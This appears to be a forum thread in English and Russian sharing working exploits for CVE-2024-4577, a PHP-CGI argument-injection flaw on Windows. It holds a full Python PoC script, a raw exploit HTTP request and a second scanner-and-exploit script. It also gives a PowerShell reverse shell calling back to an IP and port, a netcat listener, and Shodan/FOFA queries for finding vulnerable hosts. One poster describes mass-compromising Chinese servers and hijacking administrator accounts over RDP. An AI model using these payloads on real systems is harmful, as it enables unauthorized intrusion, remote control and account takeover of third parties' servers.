Remote CVE-2024-4577 (PHP cgi injection RCE for windows)

heartBit · 09.06.2024

● Github for the exploit: https://github.com/watchtowrlabs/CVE-2024-4577
● Usage: python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('Your_CMD_Command');?>" -t url
● Affected versions of PHP: 8.3 < 8.3.8; 8.2 < 8.2.20; 8.1 < 8.1.29

watchTowr-vs-php_cve-2024-4577.py

Python:

"""
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)
Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
"""

banner = """             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
       \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
                  \\/          \\/     \\/                           
      
        watchTowr-vs-php_cve-2024-4577.py
        (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
          - Aliz Hammond, watchTowr (aliz@watchTowr.com)
          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
        CVEs: [CVE-2024-4577]  """


import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse

print(banner)
print("(^_^) prepare for the Pwnage (^_^)\n")

parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True)
args = parser.parse_args()
args.target = args.target.rstrip('/')


s = requests.Session()
s.verify = False



res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" )
if('1337' in res.text ):
    print('(+) Exploit was successful')
else:
    print('(!) Exploit may have failed')

You may leave the dorks for shodan and FOFA down below

weaver · 09.06.2024

Укороченная версия, без баннеров и прочей лабуды.

-d allow_url_include=1 -d auto_prepend_file=php://input

Вся суть в "черточке" = %AD , который не экранируется, а интерпретируется.

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577

mkhalilovx29 · 10.06.2024

as orange and watchtower say in blog , the default Xampp installation affected

devcore confirm this locale affected : Traditional Chinese , Simplified Chinese , Japanese but other locale like English or western maybe affected based on configured scenario

you can search for Xampp in fofa or shodan and this is nuclei template for test :

CVE-2024-4577/CVE-2024-4577.yaml at main · 11whoami99/CVE-2024-4577

POC & $BASH script for CVE-2024-4577. Contribute to 11whoami99/CVE-2024-4577 development by creating an account on GitHub.

github.com

SlEpOy_SnIpEr · 24.06.2024

Взял список айпишек через шодан под китай. Во многих пробитых открыт rdp порт и можно изменить пароль для administrator и войти под этой учеткой.
Но для этого нужно в этом эксплоите делать поправки, для того чтоб он срабатывал.

У вас должно быть более 1 реакций для просмотра скрытого контента.

/index.php заменить на /php-cgi/php-cgi.exe

ну и сам запрос заменить и вставить ,который в nuclei

blackhunt · 07.07.2024

Description

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To targetan explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."

PHP Payload

PHP:

# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>

Scanning server

Bash:

$ python3 CVE-2024-4577.py -s -t https://target.com/
                                                 
 _____ _____ _____ _____ _____ _____                 _____       _         _  
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|
                                                |___|         |___|          
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                    
   
[+] Target https://target.com is vulnerable to CVE-2024-4577

Exploiting Vulnerable server

Bash:

$ python3 CVE-2024-4577.py -t http://example.com/index.php -e -p rev_shell.php
                                                 
 _____ _____ _____ _____ _____ _____                 _____       _         _  
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|
                                                |___|         |___|          
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner

[+] Exploit successful!

Netcat Listener

Bash:

$ nc -lvnp 9001

Discovering vulnerable host

Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
FOFA: protocol="http" && header="X-Powered-By:PHP/8.1" || hearder="X-Powered-By:PHP/8.2" || header="X-Powered-By:PHP/8.3

Source Github : https://github.com/l0n3m4n/CVE-2024-4577-RCE

Python:

import argparse
import requests
from colorama import init, Fore, Style

init(autoreset=True)

def scan_for_vulnerability(target_url):
    """Scanning for RCE CVE-2024-4577 PHP CGI Argument Injection vulnerability"""
    try:
        payload = "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        url = f"{target_url}/{payload}"
        
        # Send a POST request payload to detect vulnerability
        response = requests.post(url, data="echo 'Test'; die;", timeout=5)  # Adjust timeout as needed
        
        if 'Test' in response.text:
            return True
        else:
            return False
    except requests.exceptions.RequestException:
        return False

def exploit(target_url, payload_file):
    """Exploiting CVE-2024-4577 """
    try:
        payload = "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        url = f"{target_url}/{payload}"
        
        with open(payload_file, 'r') as file:
            php_payload = file.read()
        
        # Send a POST request with the provided PHP code
        response = requests.post(url, data=php_payload, timeout=5)# Adjust timeout as needed
        
        if response.status_code == 200:
            print(f'{Fore.GREEN}[+] Exploit successful!')
        else:
            print(f'{Fore.RED}[!] Exploit may have failed.')
    except requests.exceptions.RequestException as e:
        print(f"{Fore.RED}Error: {e}")
 
if __name__ == "__main__":
    banner = f"""{Fore.LIGHTCYAN_EX}                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_| 
                                                |___|         |___|           
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                     
    {Style.RESET_ALL}"""
    parser = argparse.ArgumentParser(description="RCE: PHP CGI Argument Injection Scanner and Exploit",
                                     epilog=f"{Fore.LIGHTCYAN_EX}Example: python3 CVE-2024-4577.py -t http://example.com -e -p shell.php{Style.RESET_ALL}")
    print(banner)
    parser.add_argument('-t', '--target', dest='target', help='Target URL or domain (e.g., http://example.com)', required=True)
    parser.add_argument('-s', '--scan', action='store_true', help='Scan for the vulnerability only')
    parser.add_argument('-e', '--exploit', action='store_true', help='Exploit the vulnerability after scanning')
    parser.add_argument('-p', '--payload', dest='payload_file', help='PHP payload file to execute (e.g., shell.php)')
 
    args = parser.parse_args()

    if not any([args.target]):
        parser.error('Please provide either a target URL (--target) or a URL to fetch PHP version (--url)')

    if args.target:
        args.target = args.target.rstrip('/')
    
    if args.scan and args.target:
        if scan_for_vulnerability(args.target):
            print(f"{Fore.LIGHTGREEN_EX}[+] Target {args.target} is vulnerable to CVE-2024-4577{Style.RESET_ALL}\n")
        else:
            print(f"{Fore.LIGHTYELLOW_EX}[-] Target {args.target} is not vulnerable to CVE-2024-4577{Style.RESET_ALL}\n")
    
    if args.exploit and args.payload_file and args.target:
        exploit(args.target, args.payload_file)
    elif args.exploit:
        print(f"{Fore.RED}[-] Please provide PHP payload to execute using the --payload option")

Remote CVE-2024-4577 (PHP cgi injection RCE for windows)

heartBit

HDD-drive

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

mkhalilovx29

ripper

CVE-2024-4577/CVE-2024-4577.yaml at main · 11whoami99/CVE-2024-4577

SlEpOy_SnIpEr

Премиум

blackhunt

(L2) cache

Description

PHP Payload

Scanning server

Exploiting Vulnerable server

Netcat Listener

Discovering vulnerable host

Remote CVE-2024-4577 (PHP cgi injection RCE for windows)

HDD-drive

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3

ripper

Премиум

(L2) cache

Description​

PHP Payload​

Scanning server​

Exploiting Vulnerable server​

Netcat Listener​

Discovering vulnerable host​

Description

PHP Payload

Scanning server

Exploiting Vulnerable server

Netcat Listener

Discovering vulnerable host